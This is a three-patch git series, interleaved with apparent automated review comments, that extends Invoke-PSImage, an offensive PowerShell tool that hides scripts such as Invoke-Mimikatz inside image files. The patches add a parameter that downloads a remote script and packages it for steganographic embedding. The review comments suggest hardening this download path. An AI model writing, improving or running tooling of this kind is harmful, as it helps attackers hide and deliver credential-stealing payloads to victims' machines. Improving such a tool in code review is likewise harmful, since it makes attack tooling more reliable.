From 346fe8c0c0a9188ef2e33091137659707e482334 Mon Sep 17 00:00:00 2001 From: Dixie Flatline Date: Tue, 19 Dec 2017 17:06:28 +0200 Subject: [PATCH 1/3] Added ability to download script from web --- Invoke-PSImage.ps1 | 20 +++++++++++++++----- 1 file changed, 15 insertions(+), 5 deletions(-) diff --git a/Invoke-PSImage.ps1 b/Invoke-PSImage.ps1 index b11ad92..046ebd4 100644 --- a/Invoke-PSImage.ps1 +++ b/Invoke-PSImage.ps1 @@ -41,15 +41,19 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki #> [CmdletBinding()] Param ( - [Parameter(Position = 0, Mandatory = $True)] + [Parameter(Position = 0, Mandatory = $False)] [String] $Script, + + [Parameter(Position = 1, Mandatory = $False)] + [String] + $Webscript, - [Parameter(Position = 1, Mandatory = $True)] + [Parameter(Position = 2, Mandatory = $True)] [String] $Image, - [Parameter(Position = 2, Mandatory = $True)] + [Parameter(Position = 3, Mandatory = $True)] [String] $Out, @@ -63,7 +67,7 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Web") # Normalize paths beacuse powershell is sometimes bad with them. - if (-Not [System.IO.Path]::IsPathRooted($Script)){ + if ( $Script -And (-Not [System.IO.Path]::IsPathRooted($Script)) ) { $Script = [System.IO.Path]::GetFullPath((Join-Path (pwd) $Script)) } if (-Not [System.IO.Path]::IsPathRooted($Image)){ @@ -74,7 +78,13 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki } # Read in the script - $ScriptBlockString = [IO.File]::ReadAllText($Script) + if ( $WebScript ) { + $R=Invoke-WebRequest $WebScript + $ScriptBlockString=$R.RawContent + } + else { + $ScriptBlockString = [IO.File]::ReadAllText($Script) + } $input = [ScriptBlock]::Create($ScriptBlockString) $payload = [system.Text.Encoding]::ASCII.GetBytes($input) From 9de7ef793064fa31ac286478b2f471bc8878db4f Mon Sep 17 00:00:00 2001 
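Review bot: With both `-Script` and `-Webscript` now `Mandatory = $False` in the `Param` block, a call that supplies neither passes parameter binding and only fails later at `[IO.File]::ReadAllText($Script)` with an empty path. A call that supplies both silently ignores the file, because the `if ( $WebScript )` branch in the third hunk wins. Moving `$Image` and `$Out` to positions 2 and 3 also changes what existing positional invocations bind to, since the second positional argument now lands in `$Webscript`. Parameter sets would express the either/or and keep the old positions: `[CmdletBinding(DefaultParameterSetName = 'File')]`, `[Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'File')]` on `$Script`, and a named-only `[Parameter(Mandatory = $True, ParameterSetName = 'Web')]` on `$Webscript`. The `Param` block continues past the hunk, and the comment-based help ending at `#>` starts above it, so whether the new parameter is documented cannot be seen here.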
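Review bot: The new `if ( $WebScript )` branch uses whatever `Invoke-WebRequest` returns without checking that the request succeeded, so after a failed download `$R` is presumably empty and the run continues with an empty script instead of stopping. The URL is not restricted to `https`, so the text handed to `[ScriptBlock]::Create` can be altered in transit without the operator noticing. On Windows PowerShell, omitting `-UseBasicParsing` also passes the response to the Internet Explorer parsing engine on the machine running the tool, which plain script text does not need. I would write `$R = Invoke-WebRequest -Uri $WebScript -UseBasicParsing -ErrorAction Stop` and reject a `$WebScript` value that does not start with `https://`. The enclosing function starts and ends outside the hunk.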
From: Dixie Flatline Date: Tue, 19 Dec 2017 17:26:31 +0200 Subject: [PATCH 2/3] Added a question mark (as of issues) https://github.com/peewpw/Invoke-PSImage/issues/1 --- Invoke-PSImage.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Invoke-PSImage.ps1 b/Invoke-PSImage.ps1 index 046ebd4..531ca94 100644 --- a/Invoke-PSImage.ps1 +++ b/Invoke-PSImage.ps1 @@ -80,7 +80,7 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki # Read in the script if ( $WebScript ) { $R=Invoke-WebRequest $WebScript - $ScriptBlockString=$R.RawContent + $ScriptBlockString=$R.RawContent+";" } else { $ScriptBlockString = [IO.File]::ReadAllText($Script) From 892a5426300031245119e70bd94d8995ed841a65 Mon Sep 17 00:00:00 2001 From: Dixie Flatline Date: Tue, 19 Dec 2017 17:30:22 +0200 Subject: [PATCH 3/3] Content instead of RawContent from WebScript --- Invoke-PSImage.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Invoke-PSImage.ps1 b/Invoke-PSImage.ps1 index 531ca94..7733ed6 100644 --- a/Invoke-PSImage.ps1 +++ b/Invoke-PSImage.ps1 @@ -80,7 +80,7 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki # Read in the script if ( $WebScript ) { $R=Invoke-WebRequest $WebScript - $ScriptBlockString=$R.RawContent+";" + $ScriptBlockString=$R.Content+";" } else { $ScriptBlockString = [IO.File]::ReadAllText($Script)
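Review bot: The `";"` appended in the `$WebScript` branch has no comment saying why it is needed, and the `else` branch that reads the file does not get it, so the two input paths now yield different strings for the same script. The reason is not visible in this hunk; if the terminator is required by the code that consumes `$ScriptBlockString`, it would be clearer to apply it once after the `if`/`else`. Either way a comment on the line should cite the report, for example `# trailing ';' added for issue #1`, and say whether it is specific to web content.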
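Review bot: `$R.Content` is a string only when the server declares a text content type; for other types `Invoke-WebRequest` returns the body as a `byte[]`, and `$R.Content+";"` then yields an array rather than script text. A type check before use makes that failure explicit instead of passing garbage on: `if ($R.Content -isnot [string]) { throw "Unexpected non-text response from $WebScript" }`. The surrounding function begins and ends outside the hunk.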